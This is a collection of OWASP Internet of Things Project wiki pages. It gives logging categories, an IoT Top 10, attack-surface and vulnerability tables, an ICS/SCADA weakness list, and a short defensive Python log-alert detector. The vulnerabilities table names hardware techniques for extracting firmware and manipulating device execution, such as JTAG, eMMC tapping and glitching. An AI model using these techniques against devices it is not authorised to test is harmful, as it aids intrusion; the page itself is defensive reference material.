|<br />
* Device Entered Administrative Mode<br />
* Device Accessed Using Default Administrative Credentials<br />
|-<br />
| '''Input Exceptions'''<br />
|<br />
* Double Encoded Character<br />
* Unexpected Encoding Used<br />
|-<br />
| '''Command Injection Exceptions'''<br />
|<br />
* Blacklist Inspection for Common SQL Injection Values<br />
* Abnormal Quantity of Returned Records<br />
|-<br />
| '''Honey Trap Exceptions'''<br />
|<br />
* Honey Trap Resource Requested<br />
* Honey Trap Data Used<br />
|-<br />
| '''Reputation Exceptions'''<br />
|<br />
* Suspicious or Disallowed User Source Location<br />
<br />
|-<br />
|}<br />
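<br />
The categories above are only useful once a device's log stream is actually turned into alerts. The following Python example is an added illustration and not part of the project's draft: it consumes a constructed device log (one JSON object per line, a format assumed for the example) and raises alerts for six of the events listed: an unsupported HTTP method, multiple failed passwords, use of default administrative credentials, a session whose source address changes, and traffic from disenrolled and unenrolled systems. The thresholds, field names and enrollment lists are assumptions.<br />
<br />
```python
import json
from collections import defaultdict, deque

# Constructed sample device log, one JSON object per line (not from any real device).
SAMPLE_LOG = """\
{"ts": 100, "event": "http_request", "method": "GET", "path": "/status", "src": "10.0.0.5", "session": "s1"}
{"ts": 101, "event": "http_request", "method": "TRACE", "path": "/", "src": "10.0.0.9", "session": null}
{"ts": 102, "event": "login_failed", "user": "admin", "src": "10.0.0.9"}
{"ts": 103, "event": "login_failed", "user": "admin", "src": "10.0.0.9"}
{"ts": 104, "event": "login_failed", "user": "admin", "src": "10.0.0.9"}
{"ts": 105, "event": "login_success", "user": "admin", "src": "10.0.0.9", "default_credentials": true, "session": "s2"}
{"ts": 106, "event": "http_request", "method": "GET", "path": "/admin", "src": "10.0.0.5", "session": "s2"}
{"ts": 107, "event": "peer_message", "device_id": "dev-0042", "src": "10.0.0.42"}
{"ts": 108, "event": "peer_message", "device_id": "dev-9999", "src": "10.0.0.99"}
"""

# Assumed policy for the example device
ALLOWED_METHODS = {"GET", "POST", "PUT", "DELETE"}
FAILED_PASSWORD_THRESHOLD = 3      # failures per user inside the window
FAILED_PASSWORD_WINDOW = 300       # seconds
ENROLLED = {"dev-0001", "dev-0002"}
DISENROLLED = {"dev-0042"}


class Detector:
    """Stateful detector mapping raw device events onto the logging categories."""

    def __init__(self):
        self.failures = defaultdict(deque)   # user -> timestamps of recent failures
        self.session_src = {}                # session id -> source address first seen
        self.alerts = []

    def _alert(self, category, event, detail):
        self.alerts.append({"category": category, "ts": event["ts"], "detail": detail})

    def _check_session(self, event):
        sid = event.get("session")
        if not sid:
            return
        first = self.session_src.setdefault(sid, event["src"])
        if first != event["src"]:
            self._alert("Session Exceptions", event,
                        f"session {sid} moved from {first} to {event['src']}")

    def feed(self, event):
        kind = event.get("event")
        if kind == "http_request":
            if event.get("method") not in ALLOWED_METHODS:
                self._alert("Request Exceptions", event,
                            f"unsupported method {event['method']} from {event['src']}")
            self._check_session(event)
        elif kind == "login_failed":
            recent = self.failures[event["user"]]
            recent.append(event["ts"])
            while recent and recent[0] < event["ts"] - FAILED_PASSWORD_WINDOW:
                recent.popleft()                      # drop failures outside the window
            if len(recent) >= FAILED_PASSWORD_THRESHOLD:
                self._alert("Authentication Exceptions", event,
                            f"{len(recent)} failed passwords for {event['user']}")
        elif kind == "login_success":
            if event.get("default_credentials"):
                self._alert("Administrative Mode Events", event,
                            f"default administrative credentials used from {event['src']}")
            self._check_session(event)
        elif kind == "peer_message":
            dev = event.get("device_id")
            if dev in DISENROLLED:
                self._alert("Ecosystem Membership Exceptions", event,
                            f"traffic seen from disenrolled system {dev}")
            elif dev not in ENROLLED:
                self._alert("Ecosystem Membership Exceptions", event,
                            f"traffic seen from unenrolled system {dev}")


def analyse(log_text: str) -> list:
    """Run every line of a JSON-lines log through the detector and return the alerts."""
    detector = Detector()
    for line in log_text.splitlines():
        if line.strip():
            detector.feed(json.loads(line))
    return detector.alerts


if __name__ == "__main__":
    for alert in analyse(SAMPLE_LOG):
        print(f"[{alert['ts']}] {alert['category']}: {alert['detail']}")
```
<br />
The detector is deliberately stateful per user and per session, because most of the events in the table (repeated failures, a session that moves, a high login rate) cannot be decided from a single log line. A device that emits only isolated lines without session and device identifiers cannot support these detections, which is the gap this project describes.<br />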
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right: 25px;" valign="top" |<br />
<br />
== What is the IoT Security Logging Project? ==<br />
<br />
The IoT Security Logging Project provides a list of core events that should be logged by any IoT-related system. The project exists because IoT systems in general do not log nearly enough events to feed a solid detection and response program around IoT devices, and there are few good resources on what should be logged for companies that want to build one.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_AppSensor_Project The OWASP AppSensor Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= ICS/SCADA =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== ICS/SCADA Project ==<br />
<br />
The OWASP ICS/SCADA Top 10 software weaknesses are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Rank and ID<br />
! Title<br />
|- <br />
| '''1 - CWE-119'''<br />
|<br />
* Improper Restriction of Operations within the Bounds of a Memory Buffer<br />
|- <br />
| '''2 - CWE-20'''<br />
|<br />
* Improper Input Validation<br />
|- <br />
| '''3 - CWE-22'''<br />
|<br />
* Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')<br />
|-<br />
| '''4 - CWE-264'''<br />
|<br />
* Permissions, Privileges, and Access Controls<br />
|- <br />
| '''5 - CWE-200'''<br />
|<br />
* Information Exposure<br />
|- <br />
| '''6 - CWE-255'''<br />
|<br />
* Credentials Management<br />
|- <br />
| '''7 - CWE-287'''<br />
|<br />
* Improper Authentication<br />
|- <br />
| '''8 - CWE-399'''<br />
|<br />
* Resource Management Errors<br />
|- <br />
| '''9 - CWE-79'''<br />
|<br />
* Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')<br />
|- <br />
| '''10 - CWE-189'''<br />
|<br />
* Numeric Errors<br />
|- <br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the ICS/SCADA Project? ==<br />
<br />
The ICS/SCADA Project provides:<br />
<br />
* A list of the Top 10 most dangerous software weaknesses<br />
<br />
== Project Leaders ==<br />
<br />
* NJ Ouchn<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Community =<br />
<br />
[https://www.iamthecavalry.org/ I Am The Cavalry] <br />
<br />
A global grassroots organization that is focused on issues where computer security intersects public safety and human life.<br />
<br />
Their areas of focus include:<br />
* Medical devices<br />
* Automobiles<br />
* Home Electronics<br />
* Public Infrastructure<br />
<br />
[https://otalliance.org Online Trust Alliance]<br />
<br />
Formed as an informal industry working group in 2005, today OTA is an Internal Revenue Service (IRS) approved 501(c)(3) charitable organization with the mission to enhance online trust and empower users, while promoting innovation and the vitality of the internet. OTA is a global organization supported by over 100 organizations, headquartered in Bellevue, Washington, with offices in Washington DC.<br />
<br />
To address these mounting concerns, in January 2015 the Online Trust Alliance established the [https://otalliance.org/initiatives/internet-things IoT Trustworthy Working Group (ITWG)], a multi-stakeholder initiative. The group recognizes that “security and privacy by design” must be a priority from the onset of product development and be addressed holistically. The framework focuses on privacy, security and sustainability. The sustainability pillar is critical as it looks at the life-cycle issues related to long-term supportability and transfers of ownership of devices and the data collected.<br />
<br />
[https://allseenalliance.org/framework AllSeen Alliance]<br />
<br />
The AllSeen Alliance is a Linux Foundation collaborative project: a cross-industry consortium dedicated to enabling the interoperability of the billions of devices, services and apps that comprise the Internet of Things. The Alliance supports the AllJoyn Framework, an open source software framework that makes it easy for devices and apps to discover and communicate with each other. Developers can write interoperable applications regardless of transport layer or manufacturer, and without the need for Internet access. The software has been and will continue to be openly available for developers to download, and runs on popular platforms such as Linux and Linux-based Android, iOS and Windows, as well as many lightweight real-time operating systems.<br />
<br />
[http://www.iiconsortium.org/ The Industrial Internet Consortium (IIC)]<br />
<br />
The Industrial Internet Consortium is the open membership, international not-for-profit consortium that is setting the architectural framework and direction for the Industrial Internet. Founded by AT&T, Cisco, GE, IBM and Intel in March 2014, the consortium’s mission is to coordinate vast ecosystem initiatives to connect and integrate objects with people, processes and data using common architectures, interoperability and open standards.<br />
<br />
[http://securingsmartcities.org/ Securing Smart Cities]<br />
<br />
Securing Smart Cities is a not-for-profit global initiative that aims to solve the existing and future cybersecurity problems of smart cities through collaboration between companies, governments, media outlets, other not-for-profit initiatives and individuals across the world.<br />
<br />
===Talks===<br />
<br />
RSA Conference San Francisco <br> <br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf Securing the Internet of Things: Mapping IoT Attack Surface Areas with the OWASP IoT Top 10 Project] <br><br />
Daniel Miessler, Practice Principal <br><br />
April 21, 2015 <br><br />
--- <br><br />
Defcon 23 <br><br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping] <br><br />
Daniel Miessler <br><br />
August 6-9, 2015<br />
<br />
===Podcasts===<br />
<br />
* [http://iotpodcast.com/ The Internet of Things Podcast]<br />
* [http://www.iot-inc.com/ IoT Inc]<br />
* [https://craigsmith.net/iot-this-week/ IoT This Week]<br />
* [http://farstuff.com/ Farstuff: The Internet of Things Podcast]<br />
<br />
===IoT Conferences===<br />
<br />
* [http://www.iotevents.org Internet of Things Events]<br />
<br />
Conference Call for Papers<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=internet+of+things&year=t WikiCFP - Internet of Things]<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=iot&year=t WikiCFP - IoT]<br />
<br />
<br />
<br />
=Project About=<br />
<br />
{{Template:Project About<br />
| project_name =OWASP Internet of Things Project<br />
| project_description = <br />
| project_license =CC-BY 3.0 for documentation and GPLv3 for code. <br />
| leader_name1 = Daniel Miessler<br />
| leader_email1 = <br />
| leader_username1 = <br />
| leader_name2 =Craig Smith<br />
| leader_email2 = <br />
| leader_username2 = <br />
| contributor_name1 = Justin Klein Keane<br />
| contributor_email1 = <br />
| contributor_username1 = Justin_C._Klein_Keane<br />
| contributor_name2 = Yunsoul<br />
| contributor_email2 = <br />
| contributor_username2 = Yunsoul<br />
| mailing_list_name = <br />
| links_url1 = <br />
| links_name1 =<br />
}} <br />
<br />
<br />
<br />
__NOTOC__ <headertabs></headertabs><br />
<br />
[[Category:OWASP_Project]] <br />
[[Category:OWASP_Document]] <br />
[[Category:OWASP_Download]] <br />
[[Category:OWASP_Release_Quality_Document]]</div>
<hr />
File:OWASP-IoT-Top-10-2018-final.pdf, uploaded 2018-12-19T23:16:21Z by Aaron.guzman (https://wiki.owasp.org/index.php?title=File:OWASP-IoT-Top-10-2018-final.pdf&diff=246175)<br />
<div>IoT Top 10 2018</div>
<hr />
File:2018 IoT Top10.png, uploaded 2018-12-19T23:07:43Z by Aaron.guzman (https://wiki.owasp.org/index.php?title=File:2018_IoT_Top10.png&diff=246170)<br />
<div>2018 IoT Top10</div>
<hr />
OWASP Internet of Things Project, earlier revision of 2018-12-19T21:45:34Z by Aaron.guzman (/* Classifications */; https://wiki.owasp.org/index.php?title=OWASP_Internet_of_Things_Project&diff=246169)<br />
<div>= Main =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
==Get Involved!==<br />
<br />
The OWASP IoT Project is currently reviewing the Top Ten list for 2018. Provide your insight and expertise by joining the #iot-security channel meetups on Slack.<br />
<br />
==OWASP Internet of Things (IoT) Project==<br />
<br />
Oxford defines the Internet of Things as: “A proposed development of the Internet in which everyday objects have network connectivity, allowing them to send and receive data.”<br />
<br />
''The OWASP Internet of Things Project is designed to help manufacturers, developers, and consumers better understand the security issues associated with the Internet of Things, and to enable users in any context to make better security decisions when building, deploying, or assessing IoT technologies''. <br />
<br />
The project looks to define a structure for various IoT sub-projects such as Attack Surface Areas, Testing Guides and Top Vulnerabilities.<br />
<br />
==Licensing==<br />
The OWASP Internet of Things Project is free to use. It is licensed under the [http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, adapt it, and use it commercially, provided that you attribute the work and that, if you alter, transform, or build upon it, you distribute the resulting work only under the same or a similar license.<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the OWASP Internet of Things Project? ==<br />
<br />
The OWASP Internet of Things Project provides information on:<br />
<br />
* [https://www.owasp.org/index.php/IoT_Attack_Surface_Areas IoT Attack Surface Areas]<br />
* IoT Vulnerabilities<br />
* Firmware Analysis<br />
* ICS/SCADA Software Weaknesses<br />
* Community Information<br />
* [https://www.owasp.org/index.php/IoT_Testing_Guides IoT Testing Guides]<br />
* [https://www.owasp.org/index.php/IoT_Security_Guidance IoT Security Guidance]<br />
* [https://www.owasp.org/index.php/Principles_of_IoT_Security Principles of IoT Security]<br />
* [https://www.owasp.org/index.php/IoT_Framework_Assessment IoT Framework Assessment]<br />
* Developer, Consumer and Manufacturer Guidance<br />
* Design Principles<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Contributors ==<br />
* [https://www.owasp.org/index.php/User:Justin_C._Klein_Keane Justin Klein Keane]<br />
* Saša Zdjelar<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Project|OWASP Project Repository]]<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security]<br />
* [https://www.owasp.org/index.php/C-Based_Toolchain_Hardening OWASP C-based Toolchain Hardening]<br />
<br />
| style="padding-left:25px;width:200px;" valign="top" |<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The OWASP Slack Channel]<br />
<br />
Hint: If you're new to Slack, [https://lists.owasp.org/pipermail/owasp-community/2015-July/000703.html join OWASP's slack channel first], then join #iot-security within OWASP's channel.<br />
<br />
== Quick Download ==<br />
[https://1drv.ms/v/s!AucQMYXJNefdwAwa5IPz2cg3cvWe OWASP IoT 2018 Planning Session]<br />
<br />
[https://www.owasp.org/images/7/7b/IoT_Preso_v1.pptx Quick discussion on IoT]<br />
<br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping DEFCON 23]<br />
<br />
[https://www.owasp.org/images/2/2d/Iot_testing_methodology.JPG IoT Testing Guidance Handout]<br />
<br />
[https://www.owasp.org/images/7/71/Internet_of_Things_Top_Ten_2014-OWASP.pdf OWASP IoT Top Ten PDF]<br />
<br />
[https://www.owasp.org/images/8/8e/Infographic-v1.jpg OWASP IoT Top Ten Infographic]<br />
<br />
[https://www.owasp.org/images/0/01/Internet_of_Things_Top_Ten_2014-OWASP-ppt.pptx OWASP IoT Top Ten PPT]<br />
<br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf OWASP IoT Top Ten-RSA 2015]<br />
<br />
[https://www.owasp.org/images/b/bd/OWASP-IoT.pptx OWASP IoT Project Overview]<br />
<br />
== News and Events ==<br />
* [https://1drv.ms/v/s!AucQMYXJNefdwAwa5IPz2cg3cvWe OWASP IoT 2018 Planning Session]<br />
* Added a [https://owasp-iot-security.slack.com/ Slack channel]<br />
* Added a sub-project; [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoT_Security_Policy_Project IoT Security Policy Project]<br />
* Daniel Miessler gave his [https://www.youtube.com/watch?v=RhxHHD790nw IoT talk at DEFCON 23]<br />
* Migrating the IoT Top Ten to be under the IoT Project<br />
* HP Study Reveals 70 Percent of Internet of Things Devices Vulnerable to Attack<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| rowspan="2" width="50%" valign="top" align="center" | [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| width="50%" valign="top" align="center" | [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| width="50%" valign="top" align="center" | [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= IoT Top 10 =<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
== Internet of Things (IoT) Top 10 2018 ==<br />
The OWASP IoT Project is currently reviewing the Top Ten list for 2018. The official launch date is December 2018. Provide your insight and expertise by joining the #iot-security channel meetups on Slack.<br />
* I1 Weak, Guessable, or Hardcoded Passwords<br />
* I2 Insecure Network Services<br />
* I3 Insecure Ecosystem Interfaces<br />
* I4 Lack of Secure Update Mechanism<br />
* I5 Use of Insecure or Outdated Components<br />
* I6 Insufficient Privacy Protection<br />
* I7 Insecure Data Transfer and Storage<br />
* I8 Lack of Device Management<br />
* I9 Insecure Default Settings<br />
* I10 Lack of Physical Hardening<br />
<br />
== Internet of Things (IoT) Top 10 2014 ==<br />
* [[Top 10 2014-I1 Insecure Web Interface|I1 Insecure Web Interface]]<br />
* [[Top 10 2014-I2 Insufficient Authentication/Authorization|I2 Insufficient Authentication/Authorization]]<br />
* [[Top 10 2014-I3 Insecure Network Services|I3 Insecure Network Services]]<br />
* [[Top 10 2014-I4 Lack of Transport Encryption|I4 Lack of Transport Encryption]]<br />
* [[Top 10 2014-I5 Privacy Concerns|I5 Privacy Concerns]]<br />
* [[Top 10 2014-I6 Insecure Cloud Interface|I6 Insecure Cloud Interface]]<br />
* [[Top 10 2014-I7 Insecure Mobile Interface|I7 Insecure Mobile Interface]]<br />
* [[Top 10 2014-I8 Insufficient Security Configurability|I8 Insufficient Security Configurability]]<br />
* [[Top 10 2014-I9 Insecure Software/Firmware|I9 Insecure Software/Firmware]]<br />
* [[Top 10 2014-I10 Poor Physical Security|I10 Poor Physical Security]]<br />
<br />
= IoT Attack Surface Areas =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Attack Surface Areas Project ==<br />
<br />
The OWASP IoT Attack Surface Areas (DRAFT) are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
** UART (Serial)<br />
** JTAG / SWD<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure ([[Top 10 2013-A6-Sensitive Data Exposure|See OWASP Top 10 - A6 Sensitive data exposure]]):<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
** Check for outdated software versions and the known vulnerabilities that affect them (Heartbleed, Shellshock, old PHP versions, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade possibility<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Firmware loaded over insecure channel (no TLS)<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Check for insecure direct object references<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of the same static encryption/decryption key across devices<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reuse of session keys, tokens, etc.<br />
* Device to device authentication<br />
* Device to mobile application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Privacy'''<br />
|<br />
* User data disclosure<br />
* User/device location disclosure<br />
* Differential privacy<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing environment manipulation<br />
* Physical tampering<br />
* Physical damage<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Attack Surface Areas Project? ==<br />
<br />
The IoT Attack Surface Areas Project provides a list of attack surfaces that should be understood by manufacturers, developers, security researchers, and those looking to deploy or implement IoT technologies within their organizations.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_Mobile_Security_Project The OWASP Mobile Top 10 Project]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project The OWASP Web Top 10 Project]<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Vulnerabilities =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Vulnerabilities Project ==<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Vulnerability<br />
! Attack Surface<br />
! Summary<br />
|-<br />
| '''Username Enumeration'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to collect a set of valid usernames by interacting with the authentication mechanism<br />
|-<br />
| '''Weak Passwords'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to set account passwords to '1234' or '123456' for example.<br />
* Usage of pre-programmed default passwords<br />
|-<br />
| '''Account Lockout'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to continue sending authentication attempts after 3 - 5 failed login attempts<br />
|-<br />
| '''Unencrypted Services'''<br />
|<br />
* Device Network Services<br />
|<br />
* Network services are not properly encrypted to prevent eavesdropping or tampering by attackers<br />
|-<br />
| '''Two-factor Authentication'''<br />
|<br />
* Administrative Interface<br />
* Cloud Web Interface<br />
* Mobile Application<br />
|<br />
* Lack of two-factor authentication mechanisms such as a security token or fingerprint scanner<br />
|-<br />
| '''Poorly Implemented Encryption'''<br />
|<br />
* Device Network Services<br />
|<br />
* Encryption is implemented, but it is improperly configured or not kept up to date, e.g. using SSL v2<br />
|-<br />
| '''Update Sent Without Encryption'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Updates are transmitted over the network without using TLS or encrypting the update file itself<br />
|-<br />
| '''Update Location Writable'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Storage location for update files is world writable potentially allowing firmware to be modified and distributed to all users<br />
|-<br />
| '''Denial of Service'''<br />
|<br />
* Device Network Services<br />
|<br />
* The service can be attacked in a way that denies service to that service or to the entire device<br />
|-<br />
| '''Removal of Storage Media'''<br />
|<br />
* Device Physical Interfaces<br />
|<br />
* Ability to physically remove the storage media from the device<br />
|-<br />
| '''No Manual Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to manually force an update check for the device<br />
|-<br />
| '''Missing Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to update device<br />
|-<br />
| '''Firmware Version Display and/or Last Update Date'''<br />
|<br />
* Device Firmware<br />
|<br />
* Current firmware version is not displayed and/or the last update date is not displayed<br />
|-<br />
| '''Firmware and storage extraction'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://www.flashrom.org/Flashrom In-Situ dumping]<br />
* Intercepting an OTA update<br />
* Downloading from the manufacturer's web page<br />
* [https://www.exploitee.rs/index.php/Exploitee.rs_Low_Voltage_e-MMC_Adapter eMMC tapping]<br />
* Unsoldering the SPI flash / eMMC chip and reading it in an adapter<br />
|<br />
* Firmware contains a lot of useful information, such as source code and binaries of running services, pre-set passwords, SSH keys, etc.<br />
|-<br />
| '''Manipulating the code execution flow of the device'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://wiki.newae.com/Main_Page Side channel attacks like glitching]<br />
|<br />
